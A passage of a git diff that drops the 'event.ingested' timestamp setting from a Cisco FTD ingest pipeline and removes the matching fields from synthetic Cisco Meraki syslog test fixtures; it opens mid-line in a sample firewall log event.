ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event",
diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index bc3fb0f7578..5b050c3660c 100644
--- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -1,9 +1,6 @@
 ---
 description: "Pipeline for Cisco FTD logs"
 processors:
- - set:
- field: event.ingested
- value: "{{_ingest.timestamp}}"
 - rename:
 field: message
 target_field: event.original
diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 213f16f19ce..56b11c82527 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402787257Z" - }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402790126Z" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402791078Z" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402791945Z" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "tags": [ "preserve_original_event" 
@@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402792809Z" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402793701Z" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402797371Z" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402798420Z" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402799284Z" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402800146Z" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "tags": [ "preserve_original_event" 
@@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402801009Z" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402802103Z" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402802989Z" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402803848Z" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402804715Z" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "tags": [ "preserve_original_event" 
@@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402805575Z" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402806636Z" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402807497Z" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402808365Z" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402809273Z" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "tags": [ "preserve_original_event" 
@@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402810162Z" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402811026Z" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "tags": [ "preserve_original_event" 
@@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402811950Z" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402812929Z" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402813796Z" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402814698Z" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402815606Z" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402816477Z" - }, "message": "amnih 1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "tags": [ "preserve_original_event" 
@@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402817329Z" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402818188Z" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402819089Z" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402819955Z" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402820928Z" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "tags": [ "preserve_original_event" 
@@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402821803Z" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402822774Z" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402823636Z" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402824495Z" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "tags": [ "preserve_original_event" 
@@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402859624Z" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402860969Z" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402861866Z" - }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402862738Z" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402863582Z" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402864441Z" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "tags": [ "preserve_original_event" 
@@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402865373Z" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402866225Z" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402867073Z" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402867921Z" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402868775Z" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "tags": [ "preserve_original_event" 
@@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402869648Z" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402870491Z" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402871577Z" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402872431Z" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402873284Z" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402874155Z" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "tags": [ "preserve_original_event" 
@@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402875353Z" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402876192Z" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402877035Z" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402877879Z" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402878756Z" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402879608Z" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "tags": [ "preserve_original_event" 
@@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402880460Z" - }, "message": "lorsitam tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402881305Z" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402882160Z" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402883012Z" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402883878Z" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402884730Z" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "tags": [ "preserve_original_event" 
@@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402885579Z" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402886438Z" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "tags": [ "preserve_original_event" 
@@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402887291Z" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402888137Z" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402888988Z" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402889888Z" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "tags": [ "preserve_original_event" 
